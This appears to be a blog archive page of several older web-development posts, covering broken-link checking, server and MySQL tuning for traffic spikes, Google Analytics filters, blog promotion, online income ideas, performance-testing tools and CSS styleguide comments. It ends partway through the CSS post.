How to check site regularly and avoid problems

You must have seen annoying error pages when you click on a website. It may have indicated that the link is invalid or doesn’t exist anymore. Usually site owners don’t delete any pages from their website because those pages are indexed in Google or other search engines but due to some technical fault those pages are showing invalid errors. This is where regular site maintenance is very important to ensure that links are valid and working properly irrespective of internal or external links.

Link types

Normally, web applications contain a vast number of links. These links may go to a resource within the site (internal links) or outside of the current application (external links). In addition, other sites may link to a site. First, I concentrate on links within a site and how these may be located and resolved.

Finding broken links

Its virtually impossible to test each of the site links manually because the number of pages in your site keeps growing making it very difficult to browse through all the pages. Its possible in case of very small websites though. Thankfully, there are a variety of tools available to automate this process, allowing you to concentrate on fixing the problem links. Basically, these tools crawl a site and verify all links found. Options are often included to define: what should be checked, links to ignore, and more. The following list provides a selection of these tools:

  • Xenu Link Sleuth: This is a preferred tool. It is fast and free. It provides great output via a detailed report of problems encountered. In addition to checking links, it verifies a variety of linked resources including images, frames, plug-ins, backgrounds, local image maps, style sheets, scripts, and Java applets.
  • LinkAlarm : This commercial service allows you to check the validity of all links within a site or page. It provides a very detailed report that is color-coded to highlight problems, as well as graphs (and everybody loves a good graph).
  • W3C Link Checker: This online web application allows you to validate links within a web application. It dives into a web resource and provides information on invalid links or error messages.

Once a link is identified as a problem, you must decide how to address it.

Fixing broken links

The error message returned when trying to access a web resource can reveal a lot about what may be wrong. The following list provides information about error codes that may be returned when attempting to access it via a link:

  • 301: This error says the target resource was permanently moved.
  • 302: This error says the target resource was temporarily moved.
  • 401: This signals an authorization error while trying to access a resource — meaning the resource may require a log-on for access.
  • 404: The resource no longer exists, as this error signals the target resource was not found.
  • 408: The request to access the resource timed out.
  • 500: The most common error that is a generic catch-all. It signals there was a problem with the target resource. The platform for the target resource may provide more information.
  • 904: This error signals a bad host name in the link.

A tool like Xenu Link Sleuth provides the error code returned for a broken link. A time-out error may mean the link is valid but busy when tested — you can retest manually, but the rest of the errors signal the link should be removed or replaced.

When dealing with internal links in an application, you may examine the target resource to identify what problems may exist within the page source code. An error code of 500 with an internal page usually signals a code error, so the error may be resolved with a code fix. The link will be fixed if the target page is fixed, but you will want to disable or remove the link until the problems with the target resource are addressed.

Unfortunately, there is not much you can do when dealing with external links on sites with which you have no control. In these instances, you will need to remove or replace the link to avoid user problems.

Inbound links

The beauty of the web is the ability to link to other sites. These inbound links from other sites may generate errors as well. This poses a greater threat to potential users or customers that will be quickly turned away when confronted with a broken link on another site. These broken links may be caused by a deleted or renamed page, an old entry in a search index, a bad bookmark, or an incorrect URL.

One way to approach these errors is to set up your web application to gracefully handle the errors outlined earlier. For example, a custom error page may be created for each error, so the custom page is displayed when/if the error occurs. This custom page can contain a user friendly message, as well as valid links within the application. A good example is creating a custom 404 page to circumvent situations where a linked resource no longer exists. The set-up for such pages will depend on the web application platform.

Another way to address errors is by implementing redirects that automatically send a user to another site resource when an error comes up. Again, the set-up and usage of redirects depends upon your platform.

Lastly, you may try to keep an eye on external sites with broken links through tools like the Google Webmaster Tools, which include the ability to crawl error sources and view sites with invalid links.

Don’t Relax

Pushing a site to production does not give you any time to relax, as regular maintenance must be performed to keep the site up and available. One part of regular maintenance should be link validation to make sure users don’t experience problems while using the application.

Do you or someone within your organisation regularly perform such maintenance on your web applications? If so, what tools or methods do you prefer? Leave me a comment and let me hear your opinion. If you’ve got any thoughts, comments or suggestions for things we could add, leave a comment! Also please Subscribe to our RSS for latest tips, tricks and examples on cutting edge stuff.

How to survive heavy traffic? A practical approach

Have you every wondered what if your website or blog page reaches to front page of big sites like Digg, Yahoo or StumbleUpon? You will recieve enormous traffic and this will surely kill your server if you haven’t optimized it to survive heavy traffic. There are various ways you can speed up your website but i am mentioning the practical optimization which doesn’t need any additional hardware or commercial software.

If you are familiar with the hosting, setup and system administration you can do it yourself otherwise you will need help of a person who knows how to handle server. Beware, if you don’t know what you’re doing you could seriously mess up your system.

Cache PHP Output

Every time a request hits your server, PHP has to do a lot of processing, all of your code has to be compiled & executed for every single visit. Even though the outcome of all this processing is identical for both visitor 21600 and 21601. So why not save the flat HTML generated for visitor 21600, and serve that to 21601 as well? This will relieve resources of your web server and database server because less PHP often means less database queries.

Now you could write such a system yourself but there’s a neat package in PEAR called Cache_Lite that can do this for us, benefits:

  • it saves us the time of inventing the wheel
  • it’s been thoroughly tested
  • it’s easy to implement
  • it’s got some cool features like lifetime, read/write control, etc.

Installing is like taking candy from a baby. On Ubuntu I would:

Create Turbo Charged Storage

With the PHP caching mechanism in place, we take away a lot of stress from your CPU & RAM, but not from your disk. This can be solved by creating a storage device with your system’s RAM, like this:

Now the directory /var/www/www.mysite.com/ramdrive is not located on your disk, but in your system’s memory. And that’s about 30 times faster 🙂 So why not store your PHP cache files in this directory? You could even copy all static files (images, css, js) to this device to minimize disk IO. Two things to remember:

  • All files in your ramdrive are lost on reboot, so create a script to restore files from disk to RAM
  • The ramdrive itself is lost on reboot, but you can add an entry to /etc/fstab to prevent that

CronJobs for heavy processings

Sometimes, you might be processing data which consumes lots of queries, calls to db, processing or maintaining counts etc. All those tasks should be left for CronJobs and the demon will run automatically and perform the required action per interval you set.

For example. if you are counting hits per article you are you are updating counter every time locking the record with WHERE statement. To avoid that you can simple use relativity performance-cheap SQL INSERTS into a separate table.  Now, the CronJob will process the gathered data in every 5 minutes which will be automatically run by the server. It counts the hits per article, then deletes the gathered data and updates the grand totals in a separate field the my article table. So finally accessing the hit count of an article takes no extra processing time or heavy queries.

Optimize your Database

Use the InnoDB storage engine

If you use MySQL, the default storage engine for tables is MyISAM. That not ideal for a high traffic website because MyISAM uses table level locking, which means during an UPDATE, nobody can access any other record of the same table. It puts everyone on hold!

InnoDB however, uses Row level locking. Row level locking ensures that during an UPDATE, nobody can access that particular row, until the locking transaction issues a COMMIT.

phpmyadmin allows you to easily change the table type in the Operations tab. Though it never caused me any problems, it’s wise to first create a backup of the table you’re going to ALTER.

Use optimal field types

Wherever you can, make integer fields as small as possible (not by changing the length but by changing it’s actual integer type). Here’s an overview:

What different integer field types can contain
range signed range unsigned
fieldtype min max min max
TINYINT -128 127 0 255
SMALLINT -32,768 32,767 0 65,535
MEDIUMINT -8,388,608 8,388,607 0 16,777,215
INT -2,147,483,648 2,147,483,647 0 4,294,967,295
BIGINT -9,223,372,036,

854,775,808
9,223,372,036,

854,775,807
0 18,446,744,073,

709,551,615

So if you don’t need negative numbers in a column, always make a field unsigned. That way you can store maximum values with minimum space (bytes). Also make sure foreign keys have matching field types, and place indexes on them. This will greatly speedup queries.

In phpmyadmin there’s a link Propose Table Structure. Take a look sometime, it will try to tell you what fields can be optimized for your specific db layout.

Queries

Never select more fields than strictly necessary. Sometimes when you’re lazy you might do a:

even though a

would suffice. Normally that’s OK, but not when performance is your no.1 priority.

Tweak the MySQL config

Furthermore there are quite some things you can do to the my.cnf file, but I’ll save that for another article as it’s a bit out of this article’s scope.

Save some bandwidth

Save some sockets first

Small optimizations make for big bandwidth savings when volumes are high. If traffic is a big issue, or you really need that extra server capacity, you could throw all CSS code into one big .css file. Do this with the JS code as well. This will save you some Apache sockets that other visitors can use for their requests. It will also give you better compression rations, should you choose to mod_deflate or compress your JavaScript with Dean Edwards Packer.

I know what your thinking. No, don’t throw all the CSS and JS in the main page. You still really want this separation to:

  1. make use of the visitor’s browser cache. Once they’ve got your CSS, it won’t be downloaded again
  2. not pollute your HTML with that stuff

And now some bandwidth 😉

  • Limit the number of images on your site
  • Compress your images
  • Eliminate unnecessary whitespace or even compress JS with tools available everywhere.
  • Apache can compress the output before it’s sent back to the client through mod_deflate. This results in a smaller page being sent over the Internet at the expense of CPU cycles on the Web server. For those servers that can afford the CPU overhead, this is an excellent way of saving bandwidth. But I would turn all compression off to save some extra CPU cycles.

Store PHP sessions in your database

I you use PHP sessions to keep track of your logged in users, then you may want to have a look at PHP’s function: session_set_save_handler. With this function you can overrule PHP’s session handling system with you own class, and store sessions in a database table.

Now a key attribute to success, is to make this table’s storage engine: MEMORY (also known as HEAP). This stores all session information (should be tiny variables) in the database server’s RAM. Taking away disk IO stress from your web server, plus allowing to share the sessions with multiple web servers in the future, so that if you’re logged in on server A, you’re also logged in on server B, making it possible to load balance.

Sessions on tmpfs

If it’s too much of a hassle to store sessions in a MEMORY database, storing session files on a ramdisk is also a good options to gain some performance. Just make the /var/lib/php5 live in RAM.

More tips

Some other things to google on if you want even more:

  • eAccelerator
  • memcached
  • tweak the apache config
  • squid
  • turn off apache logging
  • Add ‘noatime’ in /etc/fstab on your web and data drives to prevent disk writes on every read

If you’ve got any thoughts, comments or suggestions for things we could add, leave a comment! Also please Subscribe to our RSS for latest tips, tricks and examples on cutting edge stuff.

Are you tweaking your Google Analytics for success?

Ever wondered how your competitors are doing well than you ? One reason of this could be their way to measure their traffic and tweaking performance, usability stuff. Google Analytics provides you with the best insight of your web site and using the following tweaks you can analyze, measure and improve your traffic and so Success.

When Google released Google Analytics, they allowed webmasters to use near-enterprise level analytics for free. However, there are a lot of things you need to tinker with in order to get some of the data you need from it. So, here’s my list of 10 things you really should be doing to get the most out of GA.

  1. Tracking clicks on links. Every time you put a link to anything external or a download on a page, make sure you add onClick=”javascript: pageTracker._trackPageview(’/link/linkname’); “. Always know where your visitors went.
  2. Tracking user groups. If you’re sending people to a landing page, and you want to know where they go from there, segment them by using onLoad=”javascript:pageTracker._setVar(’Segment/Subgroup’);”. This will help you know what different groups are doing, and split-test user behaviour.
  3. Tracking full referred URLs. You’ll often get visits from forums or blogs that append their URLs. That’s not much use to you, so to make sure you know where people actually came from, set up a filter with the following settings:
    • Name: Full Referrers
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Referral > (.*)
    • Field B -> Extract B:
    • Output To -> Constructor: User-defined > $A$1
  4. Exclude internal visits. Add a new filter, with the “Exclude all traffic from an IP address” setting. Then add your own IP address, and repeat for any other IPs you don’t want to be included. Make sure you escape any full stops, with a backslash, like this: 63\.212\.171\.
  5. Tracking across multiple domains/subdomains. If you’re running a very large site, or a site that spans multiple domains, you’ll need to be able to track visits across those sites. Fortunately, we have a way of doing that. Firstly, we set up the following filter:
    • Name: Full URI
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Hostname > (.*)
    • Field B -> Extract B: Request URI > (.*)
    • Output To -> Constructor: Request URI > /$A1$B1

    Now you’ll see URLs in your content reports that look like this: www.example.com/index.html, help.example.com/more.html and so on. Next, we tweak the analytics code slightly, so it looks like this:

    That will make the code work across all our (sub)domains. Finally, whenever you link from one domain to the other, make sure that you stick this piece of code into the link: onclick=”pageTracker._link(this.href); return false;”. Alternatively, if you’re using forms to jump between domains, use this code instead: onSubmit=”javascript:pageTracker._linkByPost(this)”.

  6. Tracking ecommerce transactions. Yes, Google Analytics has a full ecommerce module built in too. To turn it on, go to the account settings, and change the Ecommerce Website button from No to Yes. Now, on your receipt page, add the following code, with the fields below being filled from the order.

    The last part (pageTracker._addItem( to the closing ); is repeated for each extra product or order in the transaction. And now you’ve got ecommerce tracking!

  7. Tracking exact keywords for AdWords. The problem with the keyword reports for your paid search campaigns, is that they only show the keyword that was triggered, not the exact keyword the person actually typed in. If you want to get that, you’re going to have to create the following two filters…
    • Name: PPC Keywords 1
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Referral > (\?|&)(q|p)=([^&]*)
    • Field B -> Extract B: Campaign Medium > cpc|ppc
    • Output To -> Constructor: Custom Field 1 > $A3

    Field A Required, Field B Required and Override Output Field need to be set to Yes.

    • Name: PPC Keywords 2
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Custom Field 1 > (.*)
    • Field B -> Extract B: Campaign Term > (.*)
    • Output To -> Constructor: Campaign Term > $B1,($A1)

    Again, Field A Required, Field B Required and Override Output Field need to be set to Yes.
    Now when you look in your reports, you’ll see the actual keyword the searchter typed in, in brackets next to the keyword that was triggered. Cool, huh?

  8. Making the site overlay tool useful. There’s a basic flaw in the way the site overlay works. Unfortunately, it groups all clicks on a URL togeter, so if you’ve got two links to the same URL, it’ll report the total data for both, rather than for each link individually. To get around this, leave the first link to the URL in question as it is, but add &location=x to the end of each additional link (where x isthe number of that link, so the first extra link would be 1, a second would be 2 and so on). Fixed!

If you’ve got any thoughts, comments or suggestions for things we could add, leave a comment! Also please Subscribe to our RSS for latest tips, tricks and examples on cutting edge stuff.

10 Things to Kick-Start Your Blog’s Growth

It can often seem as if our blog’s growth is out of our control. We post regularly and try to write the best content we can, but sometimes this doesn’t seem like enough. Our growth might plateau, or even start going backwards.

Thankfully, there are some things that are in your control. In this post, I want to explore ten actions you can do straight away that will grow your blog and send you traffic. Perform one of these tasks each day, or one a week. You’ll breathe new life into your blog.

1. Give something away. These days, most bloggers don’t want to give something away unless they get something in return (a link, or maybe a review). This seems intuitive: why give away time or resources without any clear benefits?

The truth is counter-intuitive. Give without expecting to receive and you’ll receive anyway. I’m not speaking about this hypothetically. On my own blog, I offered free simplicity reviews and post ideas for anyone who asked without asking for anything in return. I still get links from grateful participants to this day. Giving away something useful for free leaves a lasting impression. There’s no better way to get traffic and recommendations — without even asking for them.

2. Get connections to vote for you on social media. Call in a favor by asking other bloggers and social media users you know to vote up your best content. You’d be surprised how willing people are to give you a leg up if you’d only ask — especially if you do something for them in return, or have done so in the past.

3. Run a competition. The best competitions have one of three qualities: a fantastic prize, an unusual prize, or an interesting format. Other bloggers shouldn’t have to endure a sacrifice to participate. Make the requirement something that will benefit both you and the blogger, while also putting them in the running to win something. If you don’t have funds, make the prize something valuable that costs nothing to you: advertising space on your site, or a service utilizing one of your talents.

4. Write a free report. A ten page report (usually a ‘how to’ on a topic within your niche) might take a few hours to write but is something that can promote your blog in the long-term. If it’s good, people will share it around. They’ll attach it to emails and offer it as a download on their own blogs. Make sure to link back to your own blog in the report and your incoming traffic will grow exponentially as the report spreads.

5. Start a meme. Think of an idea for a blog post or a set of questions. Write that post or answer the questions, then tag ten other bloggers you’d like to participate in the meme. If you make your first article instructive, you’ll encourage everyone who participates in the meme to link back to you for the original instructions. If five of those ten bloggers you’ve tagged participate, and they each tag five others (and so on), your meme has the potential to generate dozens (or hundreds) of links back to your blog.

6. Guest-post on a popular blog. A guest-post on a popular blog can bring dozens to hundreds of targeted hits into your site. Don’t think you could ever write for a popular blog? Think again. They key things to remember when pitching to a popular blogger is: keep it short. Don’t write the post before your pitch has been accepted. Your email should include your post idea and a headline for the piece if possible. Link to your best article to show them the kind of writing you’re capable of.

7. Buy a StumbleUpon campaign. My blog has been on the front page of Digg twice and StumbleUpon is still my biggest single referrer. For $5 your can buy three-hundred hits from social media influencers. If your content is good, you can guarantee a few of those visitors will vote up your post and send you even more traffic. If your content is really good, your $5 campaign could snowball into a viral episode, bringing you thousands of visitors. Here’s some more information on running a StumbleUpon advertising campaign.

8. Comment on five popular blogs. The posts on your niche’s most popular blogs are often viewed by thousands of people. If you’re one of the first commenters, you could have thousands of eyeballs passing over your comment. Leave an insightful or thought-provoking comment and this may motivate others to investigate you and your blog. Today, try to be one of the first to comment on posts from five different popular blogs — particularly those with active and interesting comment threads. You’re bound to get some quality traffic.

9. Send out links to your best content. We all want links from popular blogs. You know what they say: if you want something, you’ve got to ask. Send a brief email to five other bloggers linking to a great post you’ve written that’s relevant to their audience. Don’t ask for a link directly, just say something like: I thought you or your readership might be interested in this. Not every person will link to you, but keep trying and eventually someone will. I’ve received hundreds of visitors over time from links that I went out and asked for. Learning to be audacious is a necessary step for any successful blogger.

10. Join a forum in your niche. Your forum signature allows you to attach a link to your blog with every post that you write. Write ten posts today and you’ve created ten new links to your site. People do click through these links. When I first launched my blog, I built its initial readership almost exclusively through participating in a niche forum. This method really does work.

10 New Ways to Make Money Online

When you look for new revenue streams, think about what you do well. Whether you’re an expert  in your field, a talented designer, a programmer, or a producer of content, there are ways to leverage your knowledge, skills and abilities, package them and provide them for a fee. And don’t forget that successful web workers are often pursuing more than one income stream at the same time. You may be able to assemble a career out of numerous smaller activities.

Read our latest list of 10 new ways to make money online after the jump.

1. Team up with Yahoo! to offer custom search services.
Yahoo! recently launched their BOSS API, which lets anyone build their own custom search engine or mashup using their search results. But you may have missed this teaser on their blog: “In the coming months, we’ll be launching a monetization platform for BOSS that will enable Yahoo! to expand its ad network and enable BOSS partners to jointly participate in the compelling economics of search.” The details of that platform aren’t out yet, but if you think you can come up with a compelling niche search offering, now’s the time to stake out your place in the market.

Screenshot2. Sell freelance support.
Software and solutions like Copilot and Bomgar make it easier than ever to take over someone’s computer remotely, whether they know anything about how to let you connect or not. If you’re a whiz with solving operating systems and applications issues, why not sell your expertise to others who are less sure of themselves? At a reasonable hourly rate, you can still offer personal service that’s infinitely better than putting up with anonymous bored workers in a telecenter somewhere.

3. Create and maintain social networks.
While companies, organizations and individuals do see the value of marketing through social networks, many of them are afraid that they’ll “waste time” setting them up and maintaining them. Step in as their social network “developer” to determine the right places – MySpace, Facebook, Twitter, et. al. – to have accounts to help them achieve their goals. Then set up their pages and manage them on a regular basis. You can also submit reports that measure your clients’ online buzz and turn that in along with your monthly invoice.

Writers Group - Wed 12pm SLT4. Plan and host virtual events.

If you’re great at organizing, publicizing and managing events, why not offer your services online? Whether a live text chat on a client’s web site or a 3-dimensional avatar-based voice chat in a virtual world such as Second Life, companies and organizations could use your help developing and coordinating these events. You can even approach conferences and offer to create an online version of their event to reach a whole separate audience of people who cannot attend their offline happenings. Throw in some event hosting and moderating a la Oprah, and you’ve got yourself a global gig without having to jump on a plane.

5. Offer remote software demos and training.
So you’ve got a way with software, particularly newfangled Web-based applications. Offer your services as a Web apps trainer and hold online demos – for a fee. You can use GoToMeeting.com, Yugma, and similar services to broadcast your demos from your computer desktop to the computer screens of your audience members. Or approach the developers of these applications, show them you know their product almost better than they do, and offer to provide desktop demos to the media and to their higher dollar business customers.

6. Hold educational teleseminars.
Are you great at web design or online marketing or any other kind of Web work and have wanted to share your skills on a larger scale while getting paid to do it? If you’ve got the expertise, bottle it and sell it widely in the form of a live teleseminar where you charge a fee for participation and then archive it in your online store to generate recurring revenues. You can do simple web-based conference call coordination through Rondee or get fancier with simultaneous text chat and online documents with Calliflower.

7. Write part of Google’s encyclopedia.
Anyone can contribute to Google’s new Knol project, an encylopedic collection of knowledge in the tradition of Wikipedia. But unlike Wikipedia, Knol shows some prospect for paying its writers – because you can automatically hook up Google Ads to a Knol entry, and you’ll get a share of the take. If you’re an authority on some subject of interest, maintaining a Knol page could at least help pay for your internet usage.

8. Flip Web Sites.
Forget trying to think of a brand new hot web site to launch. The New York Times recently reported on people who are making a good living by “flipping” existing sites. The idea: find a niche site with good potential but poor execution, and buy it. Invest your own sweat equity in a site redesign and search engine optimization, then turn around and sell it to someone else who actually wants to run the site. Repeat as often as you can.

Screenshot9. Sell your video footage.
We’ve covered the microstock photography market several times, but did you know that there’s a budding microstock video market too? If you’re a digital video fanatic, turn your high-quality b-roll into bucks using stock imaging sites that also carry video footage like Pond5, iStockPhoto Video and Pixelflow. Set your price, set your terms, and add this new revenue stream to your income.

10. Sell virtual goods.
From fashion to business tools to décor for virtual homes and offices, people who are avid users of virtual worlds are hungry for well-designed virtual goods. Second Life store, Nyte 'N' DayWhile there is a learning curve for each proprietary virtual environment such as There.com, Kaneva, Lively, and Second Life, if there is a commerce component of the world that converts to real dollars, with a keen eye for design and detail and the right building skills, you can generate income from creating products made of bits and bytes. In Second Life, for example, some of the more successful clothing designers are bringing in thousands of dollars (US) a month selling items of clothing at 75 cents to $1.50 a pop. And if you are truly an artist, your virtual goods could sell for a pretty penny.

15 Tools to Help You Develop Faster Web Pages

Response times, availability, and stability are vital factors to bear in mind when creating and maintaining a web application. If you’re concerned about your web pages’ speed or want to make sure you’re in tip-top shape before starting or launching a project, here’s a few useful, free tools to help you create and sustain high-performance web applications.

I’ve tried to include a wide variety of tools that are easy to use, and have tried to keep them as OS and technology-independent as possible so that everyone can find a tool or two.

1. YSlow for Firebug

YSlow for Firebug - Screenshot

YSlow grades a website’s performance based on the best practices for high performance web sites on the Yahoo! Developer Network. Each rule is given a letter grade (A through F) stating how you rank on certain aspects of front-end performance. It’s a simple tool for finding things you can work on such as reducing the number of HTTP request a web page makes, and compressing external JavaScript and CSS files. A worthwhile read is the Ajax performance analysis post on IBM developerWorks that outlines practical ways of using YSlow in your web applications.

2. Firebug

Firebug - Screen shot

Firebug is an essential browser-based web development tool for debugging, testing, and analyzing web pages. It has a powerful set of utilities to help you understand and dissect what’s going on. One of the many notable features is the Net (network”) tab where you can inspect HTML, CSS, XHR, JS components.

3. Fiddler 2

Fiddler 2 - Screen shot

Fiddler 2 is a browser-based HTTP debugging tool that helps you analyze incoming and outgoing traffic. It’s highly customizable and has countless of reporting and debugging features. Be sure to read the “Fiddler PowerToy – Part 2: HTTP Performance” guide on the MSDN which discusses functional uses of Fiddler including how to improve “first-visit” performance (i.e. unprimed cache), analyzing HTTP response headers, creating custom flags for potential performance problems and more.

4. Cuzillion

Cuzillion - Screen shot

Cuzillion is a cool tool to help you see how page components interact with each other. The goal here is to help you quickly rapidly check, test, and modify web pages before you finalize the structure. It can give you clues on potential trouble-spots or points of improvements. Cuzillion was created by Steve Saunders, the ex-Chief Performance at Yahoo!, a leading engineer for the development of Yahoo’s performance best practices, and creator of YSlow.

5. mon.itor.us

mon.itor.us - Screen shot

monitor.us is a free web-based service that grants you a suite of tools for monitoring performance, availability, and traffic statistics. You can establish your website’s response time and set up alerts for when a service becomes unavailable. You can also set-up weekly, automated benchmarks to see if changes you’ve made impact speed and performance either positively or negatively.

6. IBM Page Detailer

IBM Page Detailer - Screen shot

The IBM Page Detailer is a straightforward tool for letting you visualize web components as they’re being downloaded. It latches onto your browser, so all you have to do is navigate to the desired site with the IBM Page Detailer open. Clicking on a web page component opens a window with the relevant details associated with it. Whenever an event occurs (such as a script being executed), the tool opens a window with information about the processes.

7. Httperf

Httperf is an open-source tool for measuring HTTP server performance running on Linux. It’s an effective tool for benchmarking and creating workload simulations to see if you can handle high-level traffic and still maintain stability. You can also use it to figure out the maximum capacity of your server, gradually increasing the number of requests you make to test its threshold.

8. Pylot

Pylot - Screen shot

Pylot is an open-source performance and scalability testing tool. It uses HTTP load tests so that you can plan, benchmark, analyze and tweak performance. Pylot requires that you have Python installed on the server – but you don’t need to know the language, you use XML to create your testing scenarios.

9. PushToTest TestMaker

PushToTest TestMaker - Screen shot

PushToTest TestMaker is a free, open-source platform for testing scalability and performance of applications. It has an intuitive graphical user interface with visual reporting and analytical tools. It has a Resource Monitor feature to help you see CPU, memory, and network utilization during testing. The reporting features let you generate graphs or export data into a spreadsheet application for record-keeping or further statistics analysis.

10. Wbox HTTP testing tool

Wbox HTTP testing tool - Screen shot

Wbox is a simple, free HTTP testing software released under the GPL (v2). It supports Linux, Windows, and MacOS X systems. It works by making sequential requests at desired intervals for stress-testing. It has an HTTP compression command so that you can analyze data about your server’s file compression. If you’ve just set up a virtual domain, Wbox HTTP testing tool also comes with a command for you to test if everything’s in order before deployment.

11. WebLOAD

WebLOAD - Screen shot

WebLOAD is an open-source, professional grade stress/load testing suite for web applications. WebLOAD allows testers to perform scripts for load testing using JavaScript. It can gather live data for monitoring, recording, and analysis purposes, using client-side data to analyze performance. It’s not just a performance tool – it comes with authoring and debugging features built in.

12. DBMonster

DBMonster - Code Screen shot

DBMonster is an open-source application to help you tune database structures and table indexes, as well as conduct tests to determine performance under high database load. It’ll help you see how well your database/s will scale by using automated generation of test data. It supports many databases such as MySQL, PostgreSQL, Oracle, MSSQL and (probably) any database that supports the JDBC driver.

13. OctaGate SiteTimer

OctaGate SiteTimer - Screen shot

The OctaGate SiteTimer is a simple utility for determining the time it takes to download everything on a web page. It gives you a visualization of the duration of each state during the download process (initial request, connection, start of download, and end of download).

14. Web Page Analyzer

Web Page Analyzer - Screen shot

The Web Page Analyzer is an extremely simple, web-based test to help you gain information on web page performance. It gives you data about the total number of HTTP requests, total page weight, your objects’ sizes, and more. It tries to estimate the download time of your web page on different internet connections and it also enumerates each page object for you. At the end, it provides you with an analysis and recommendation of the web page tested – use your own judgment in interpreting the information.

15. Site-Perf.com

Site-Perf.com - Screen shot

Site-Perf.com is a free web-based service that gives you information about your site’s loading speed. With Site-Perf.com’s tool, you get real-time capturing of data. It can help you spot bottlenecks, find page errors, gather server data, and more – all without having to install an application or register for an account.

More Tools and Related Resources

If you have a favorite web performance tool that wasn’t on the list, share it in the comments. Would also like to hear your experiences, tips, suggestions, and resources you use.

Courtesy: sixrevisions

Improving Code Readability With CSS Styleguides

Once your latest project is finished, you are very likely to forget the structure of the project’s layout, with all its numerous classes, color schemes and type setting. To understand your code years after you’ve written it you need to make use of sensible code structuring. The latter can dramatically reduce complexity, improve code management and consequently simplify maintainability. However, how can you achieve sensible structuring? Well, there are a number of options. For instance, you can make use of comments — after all, there is always some area for useful hints, notes and, well, comments you can use afterwards, after the project has been deployed.

Indeed, developers came up with quite creative ways to use comments and text formatting to improve the maintainability of CSS-code. Such creative ways are usually combined into CSS styleguides — pieces of CSS-code which are supposed to provide developers with useful insights into the structure of the code and background information related to it.

This article presents 5 coding techniques which can dramatically improve management and simplify maintainability of your code. You can apply them to CSS, but also to any other stylesheet or programming language you are using.

1. Divide and conquer your code

First consider the structure of your layout and identify the most important modules in your CSS-code. In most cases it’s useful to choose the order of CSS-selectors according to the order of divisors (div’s) and classes in your layout. Before starting coding, group common elements in separate sections and title each group. For instance, you can select Global Styles (body, paragraphs, lists, etc), Layout, Headings, Text Styles, Navigation, Forms, Comments and Extras.

To clearly separate fragments of code, select appropriate flags or striking comments (the more *-symbols you have in your code, the more striking a heading is). In the stylesheet they will serve as a heading for each group. Before applying a preferred flag to your code, make sure you can immediately recognize single blocks when scanning through the code.

However, this approach might not be enough for large projects where a single module is too big. If it is the case, you might need to divide your code in multiple files to maintain overview of single groups of code fragments. In such situations master stylesheet is used to import groups. Using master-stylesheet you generate some unnecessary server requests, but the approach produces a clean and elegant code which is easy to reuse, easy to understand and also easy to maintain. And you also need to include only the master-file in your documents.

/*——————————————————————
[Master Stylesheet]

Project:    Smashing Magazine
Version:    1.1
Last change:    05/02/08 [fixed Float bug, vf]
Assigned to:    Vitaly Friedman (vf), Sven Lennartz (sl)
Primary use:    Magazine
——————————————————————-*/
@import "reset.css";
@import "layout.css";
@import "colors.css";
@import "typography.css";
@import "flash.css";
/* @import "debugging.css"; */

For large projects or large development team it is also useful to have a brief update log and some additional information about the project — e.g. you can put the information about who is this CSS-file assigned to and what is its primary use (e.g. Smashing Magazine, Smashing Jobs etc.).

Additionally, you can include a debugging CSS-code to take care of diagnostic styling in case you run in some problems. Consider using Eric Meyer’s Diagnostic Styling as a debugging stylesheet to test your CSS-code and fix problems.

2. Define a table of contents

To keep an overview of the structure of your code, you might want to consider defining a table of contents in the beginning of your CSS-files. One possibility of integrating a table of contents is to display a tree overview of your layout with IDs and classes used in each branch of the tree. You may want to use some keywords such as header-section or content-group to be able to jump to specific code immediately.

You may also select some important elements you are likely to change frequently — after the project is released. These classes and IDs may also appear in your table of contents, so once you’ll need to find them you’ll find them immediately — without scanning your whole code or remembering what class or ID you once used.

/*——————————————————————
[Layout]

* body
    + Header / #header
    + Content / #content
        – Left column / #leftcolumn
        – Right column / #rightcolumn
        – Sidebar / #sidebar
            – RSS / #rss
            – Search / #search
            – Boxes / .box
            – Sideblog / #sideblog
    + Footer / #footer

Navigation      #navbar
Advertisements      .ads
Content header      h2
——————————————————————-*/

…or like this:

/*——————————————————————
[Table of contents]

1. Body
    2. Header / #header
        2.1. Navigation / #navbar
    3. Content / #content
        3.1. Left column / #leftcolumn
        3.2. Right column / #rightcolumn
        3.3. Sidebar / #sidebar
            3.3.1. RSS / #rss
            3.3.2. Search / #search
            3.3.3. Boxes / .box
            3.3.4. Sideblog / #sideblog
            3.3.5. Advertisements / .ads
    4. Footer / #footer
——————————————————————-*/

Another approach is to use simple enumeration without indentation. In the exampe below, once you need to jump to the RSS-section you simply use a search tool to find 8. RSS in your code. That’s easy, quick and effective.

/*——————————————————————
[Table of contents]

1. Body
2. Header / #header
3. Navigation / #navbar
4. Content / #content
5. Left column / #leftcolumn
6. Right column / #rightcolumn
7. Sidebar / #sidebar
8. RSS / #rss
9. Search / #search
10. Boxes / .box
11. Sideblog / #sideblog
12. Advertisements / .ads
13. Footer / #footer
——————————————————————-*/
<!– some CSS-code –>

/*——————————————————————
[8. RSS / #rss]
*/
#rss { … }
#rss img { … }

Defining a table of contents you make it particularly easier for other people to read and understand your code. For large projects you may also print it out and have it in front of you when reading the code. When working in team, this advantage shouldn’t be underestimated. It can save a lot of time — for you and your colleagues.

3. Define your colors and typography

Since we don’t have CSS constants yet, we need to figure out some way to get a quick reference of “variables” we are using. In web development colors and typography can often be considered as “constants” — fixed values that are used throughout the code multiple times.

As Rachel Andrew states, “one way to get round the lack of constants in CSS is to create some definitions at the top of your CSS file in comments, to define constants. A common use for this is to create a color glossary. This means that you have a quick reference to the colors used in the site to avoid using alternates by mistake and, if you need to change the colors, you have a quick list to go down and do a search and replace.”

/*——————————————————————
# [Color codes]

# Dark grey (text): #333333
# Dark Blue (headings, links) #000066
# Mid Blue (header) #333399
# Light blue (top navigation) #CCCCFF
# Mid grey: #666666
# */

Alternatively, you can also describe color codes used in your layout. For a given color, you can display sections of your site which are using this color. Or vice versa — for a given design element you can describe the colors which are used there.

/*——————————————————————
[Color codes]

Background:    #ffffff (white)
Content:    #1e1e1e (light black)
Header h1:    #9caa3b (green)
Header h2:    #ee4117 (red)
Footer:        #b5cede (dark black)

a (standard):    #0040b6 (dark blue)
a (visited):    #5999de (light blue)
a (active):    #cc0000 (pink)
——————————————————————-*/

The same holds for typography. You can also add some important notes to understand the “system” behind your definitions.

/*——————————————————————
[Typography]

Body copy:        1.2em/1.6em Verdana, Helvetica, Arial, Geneva, sans-serif;
